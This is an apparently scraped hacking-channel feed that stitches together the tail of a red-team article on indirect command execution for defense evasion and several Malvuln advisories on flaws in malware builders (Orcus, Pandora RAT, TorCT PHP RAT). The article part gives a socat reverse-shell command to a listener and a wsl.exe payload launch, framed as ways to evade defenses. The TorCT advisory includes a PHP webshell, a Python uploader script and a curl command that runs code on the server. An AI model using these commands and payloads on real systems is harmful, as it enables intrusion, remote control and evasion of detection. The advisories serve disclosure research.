bash.exe -c "socat tcp-connect:192.168.0.89:4444 exec:sh,pty,stderr,setsid,sigint,sane"
https://blogger.googleusercontent.com/img/a/AVvXsEjlMqohYTCrWXdeE1EMDrJ1_TWQue_NK4InmPw6KRGLtY3_b-AaWZBkvtuM6wym4XFN_jE9HwdVYw79JNFW1Ss-9Su37do4nyhF6rNLhSdtDV_4T6o-qu3uZ_tc9-KdFHQsLdzVbUsbgrj-wKzz9q23GD3zK7_paGAHXWyGHvkGeJ0olVrwci-W4Mt0iA=s16000
On our reverse listener set up on port 4444, we receive a connection as the shell gets executed!
https://blogger.googleusercontent.com/img/a/AVvXsEjpXVCPNDTKhso1d2GAWMlDx_Qo6Yi2WY6dU2CNv_6JyaHLs_B5HJMS18fNYxb6Oi_nWPVWW3shkI48YPuq1e8Suof-9vvxeyDu_aMBwSbmYeK39jN28GLqkBpUFfQdJ9Biqx-0s7QpI7ErRuKX20wBX_sV5mjGT_JmB8_q-sojIXHRu-uAxvtwpE3QRg=s16000
Inspection in process explorer: In the victim system, if an analyst checks process explorer, he shall see the following processes running that should make him suspicious. As you can see, wsl.exe process has been launched under which conhost is initiated along with a socat and bash process. It is stealthy.
https://blogger.googleusercontent.com/img/a/AVvXsEittt9rmUo3xjNP73neVdVtzBTD25VwdOq4t1tR-_2WDNteK_x1lW0iiXGsJhuGo91S1EMsUSZA3C5PjqcpRX0l2LSC-5gpybV4C77JgokfV74rmaigrsi_k-HfnVlSJl4rGjLj31r2mZrsi7z-siH2ulQonRSAD4njrovkpWzL_S4u-sXG8vs9228xEw=s16000 Method 11 – WSL Only (wsl.exe)Socat instance on a WSL is plausible but not necessary. However, an executable called wsl.exe is present by default in the Windows system where WSL is installed. This exe can be used to launch the exe present in WSL. This way, the shell will be launched indirectly.
wsl.exe -e /mnt/c/Users/Public/shell.exe
https://blogger.googleusercontent.com/img/a/AVvXsEjx-BRKTlxOyVryZf57AMZchGXcj8MIPICRgIjiT0Wrob-TVJHe2wqbMuHI4v4LvsQ6OVKHP50p7vkBKzjFJAgDCG-RTL4XsQgYLUnAt0OrR8rF6OfqZ61F1zmmgc9oCxWXcRZDpQLlRHzZOyl5uJv5qdNtGYyAkemBjiO8F79cqPLoCsQRSCGEWjOkjw=s16000
On our reverse listener set up on port 4444, we receive a connection as the shell gets executed!
https://blogger.googleusercontent.com/img/a/AVvXsEg4EEg01VCw-3AGHwtyo0vjmU0xxZ240u-VZLHHOGFF3TGqzXsQz9xN_e93QKzPf2AsFOUNj9JhlicfTdlt0ns33r9Hq4MxQ1_s_v2ovNgdJj5xusvc_hn8Q3To-IUQ3AEJuewSKzGxDxOSjWPcN3mk_tDOqS2Np0jlTPaUZIKZ2C0AgIFZT-yYBSlumg=s16000
Inspection in process explorer: In the victim system, if an analyst checks process explorer, he shall see the following processes running that should make him suspicious. As you can see, wsl.exe process has been launched under which conhost is initiated along with a shell.exe process. It is not as stealthy as other methods.
https://blogger.googleusercontent.com/img/a/AVvXsEiQ9zeo7Lkaklvr1zFEz3oV258i8d72wwQm50dhTjQnXZPO8KUfZljobgM896sKQrdHVXVkDLTSo-acnHMHASUE4dyoB6F9rAt_XSkJI7YudulLl0xct8ouKicvOWiHZudk1Z-HtUXnAo1vM8y97lbevGRTuBxD8RZOTb750PzjwXuJ9PAkzu6pOSe4Tw=s16000 ConclusionWhile some of the methods defined above are stealthy, others create some noise. Red Teamers must evaluate which method they want to use in order for them to conduct operations smoothly. The aim of the article was to demonstrate as many methods as possible for indirect command execution in order for a user to evade defenses easily. Hope you liked the article. Thanks for reading.
Author: Harshit Rajpal is an InfoSec researcher and left and right brain thinker. Contact here
The post Indirect Command Execution: Defense Evasion (T1202) appeared first on Hacking Articles.
___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
BuilderOrcus Insecure Permissions
https://2.bp.blogspot.com/-eFdyzozIeoQ/WWlvJBrapBI/AAAAAAAAIL0/M7DCjoWzT04QjJ3gTxRIZh_KH17rlqHhwCLcBGAs/s1600/h146.png
BuilderOrcus malware suffers from an insecure permissions vulnerability.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
BuilderOrcus Insecure Permissions
https://2.bp.blogspot.com/-eFdyzozIeoQ/WWlvJBrapBI/AAAAAAAAIL0/M7DCjoWzT04QjJ3gTxRIZh_KH17rlqHhwCLcBGAs/s1600/h146.png
BuilderOrcus malware suffers from an insecure permissions vulnerability.
MD5 |
4ed622d4efcee3c8c9242595868e243bDownload
Discovery / credits: Malvuln - malvuln.com (c) 2022
Original source: https://malvuln.com/advisory/cc3670f1b3e60e00b43c86d787563a44.txt
Contact: malvuln13@gmail.com
Media: twitter.com/malvuln
Threat: BuilderOrcus (Orcus.Administration-cracked.exe)
Vulnerability: Insecure Permissions
Description: When building backdoor servers, the malware writes PE files with insecure permissions to c drive granting change (C) permissions to the authenticated user group. Standard users can rename the executable dropped by the malware to disable it or replace it with their own executable. Then wait for a privileged user to logon to the infected machine to potentially escalate privileges.
Family: BuilderOrcus
Type: PE32
MD5: cc3670f1b3e60e00b43c86d787563a44
Vuln ID: MVID-2022-0515
Disclosure: 03/17/2022
Exploit/PoC:
C:\>cacls Orcus.Server.exe
C:\Orcus.Server.exe BUILTIN\Administrators:(ID)F
NT AUTHORITY\SYSTEM:(ID)F
BUILTIN\Users:(ID)R
NT AUTHORITY\Authenticated Users:(ID)C
C:\>dir Orcus.Server.exe
Volume in drive C has no label.
Directory of C:\
03/15/2022 11:40 PM 3,366,040 Orcus.Server.exe
1 File(s) 3,366,040 bytes
Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
BuilderOrcus Insecure Permissions
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
BuilderOrcus Insecure Credential Storage
https://2.bp.blogspot.com/-DNFQNR6e8p4/WWlvIe_2SVI/AAAAAAAAILs/sd08rXaHefk0y1DdsYY6dPeiz0i718ntQCLcBGAs/s1600/h143.png
BuilderOrcus malware suffers from an insecure credential storage vulnerability.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
BuilderOrcus Insecure Credential Storage
https://2.bp.blogspot.com/-DNFQNR6e8p4/WWlvIe_2SVI/AAAAAAAAILs/sd08rXaHefk0y1DdsYY6dPeiz0i718ntQCLcBGAs/s1600/h143.png
BuilderOrcus malware suffers from an insecure credential storage vulnerability.
MD5 |
0e39f83eb4caa90c371794665f7e2737Download
Discovery / credits: Malvuln - malvuln.com (c) 2022
Original source: https://malvuln.com/advisory/cc3670f1b3e60e00b43c86d787563a44_B.txt
Contact: malvuln13@gmail.com
Media: twitter.com/malvuln
Threat: BuilderOrcus (Orcus.Administration-cracked.exe)
Vulnerability: Insecure Credential Storage
Description: The malware stores its password in plaintext in a settings.json file.
Family: BuilderOrcus
Type: PE32
MD5: cc3670f1b3e60e00b43c86d787563a44
Vuln ID: MVID-2022-0516
Disclosure: 03/17/2022
Exploit/PoC:
settings.json snippet.
{
"IpAddresses": [
{
"Ip": "127.0.0.1",
"Port": 10134
},
{
"Ip": "0.0.0.0",
"Port": 10134
}
],
"Password": "malvuln",
"IsDnsUpdaterEnabled": false,
"DnsUpdaterSettings": null,
Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
BuilderOrcus Insecure Credential Storage
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
BuilderPandoraRat.b Insecure Credential Storage
https://2.bp.blogspot.com/-LETyKySuDgQ/WWlvb4o-z5I/AAAAAAAAIPU/5gCHtKhwhLoet_fHEL-XnPuLlDk7q9atQCLcBGAs/s1600/h76.png
BuilderPandoraRat.b malware suffers from an insecure credential storage vulnerability.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
BuilderPandoraRat.b Insecure Credential Storage
https://2.bp.blogspot.com/-LETyKySuDgQ/WWlvb4o-z5I/AAAAAAAAIPU/5gCHtKhwhLoet_fHEL-XnPuLlDk7q9atQCLcBGAs/s1600/h76.png
BuilderPandoraRat.b malware suffers from an insecure credential storage vulnerability.
MD5 |
583432cca2a60496afc97df4725c80bfDownload
Discovery / credits: Malvuln - malvuln.com (c) 2022
Original source: https://malvuln.com/advisory/ae4a409d217bbd538009fbbb5457e754.txt
Contact: malvuln13@gmail.com
Media: twitter.com/malvuln
Threat: BuilderPandoraRat.b - (Pandora Rat 2.2 [Beta].exe)
Vulnerability: Insecure Credential Storage
Description: The malware listens on TCP port 6622. Credentials are stored in plaintext in Settings.ini file and default password is blank.
Family: Pandora
Type: PE32
MD5: ae4a409d217bbd538009fbbb5457e754
Vuln ID: MVID-2022-0517
Disclosure: 03/17/2022
Exploit/PoC:
Settings.ini
[Options]
Ports=6622#6622#
Password=malvuln
Notify=0
Upnp=0
Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
BuilderPandoraRat.b Insecure Credential Storage
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
BuilderTorCTPHPRAT.b Shell Upload
https://2.bp.blogspot.com/-8IZk1MGzGDs/WWlvRc2I8KI/AAAAAAAAINM/SaF41lFV3n4aBJrQBjJ2SaVGr7WaiJo3gCLcBGAs/s1600/h34.png
BuilderTorCTPHPRAT.b malware suffers from a remote shell upload vulnerability.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
BuilderTorCTPHPRAT.b Shell Upload
https://2.bp.blogspot.com/-8IZk1MGzGDs/WWlvRc2I8KI/AAAAAAAAINM/SaF41lFV3n4aBJrQBjJ2SaVGr7WaiJo3gCLcBGAs/s1600/h34.png
BuilderTorCTPHPRAT.b malware suffers from a remote shell upload vulnerability.
MD5 |
e1f0f065b12c52e203c5e37d8ba67035Download
Discovery / credits: Malvuln - malvuln.com (c) 2022
Original source: https://malvuln.com/advisory/838f67d7a4b6824ec59892057aab3bb7_B.txt
Contact: malvuln13@gmail.com
Media: twitter.com/malvuln
Threat: BuilderTorCTPHPRAT.b
Vulnerability: Arbitrary File Upload - RCE
Family: TorCTPHPRAT
Type: WebUI
MD5: 838f67d7a4b6824ec59892057aab3bb7 (Webremote TorCT Client.exe)
MD5: b54822058a3ed33c673d06113b453ebe (upload.php)
Vuln ID: MVID-2022-0519
Disclosure: 03/17/2022
Description: The TorCT client malwares web-panel allows unauthenticated uploads and does not check the expected file type E.g. ".png". Third-party attackers who can reach the server can upload their own backdoor PHP webshell and execute any commands on the malwares C2 server.
"upload.php" vulnerable code:
$DelOrNot = $_GET['D'];
if ($DelOrNot == "true")
{
unlink('Upload/1.png');
unlink('Upload/2.png');
}else{
$uploadDir = 'Upload/';
$uploadFile = $uploadDir . basename($_FILES['file']['name']);
if (is_uploaded_file($_FILES['file']['tmp_name']))
{
echo "File ". $_FILES['file']['name'] ." is successfully uploaded!\r\n";
if (move_uploaded_file($_FILES['file']['tmp_name'], $uploadFile))
{
echo "File is successfully stored! ";
}
else print_r($_FILES);
}
else
{
echo "Upload Failed!";
print_r($_FILES);
}
}
Exploit/PoC:
1) Create PHP webshell "pwn.php", exec($_GET['cmd']);
2) Create Python uploader "torct_webshell.py"
import requests
url="http://TORCT_PHP_RAT_SERVER/BuilderTorCTPHPRAT.b/New_TorCT_6_22_1_6/UPLOAD%20%20(New%20PHP%20FILES)/upload.php"
files = {'file': open('pwn.php', 'rb')}
r = requests.post(url, files=files)
if r.status_code==200:
print(r.status_code)
print("TorCTPHPRAT PWNED!")
3) Exploit
curl "http://127.0.0.1/BuilderTorCTPHPRAT.b/New_TorCT_6_22_1_6/UPLOAD%20%20(New%20PHP%20FILES)/upload/pwn.php?cmd=calc.exe"
Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
BuilderTorCTPHPRAT.b Shell Upload
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.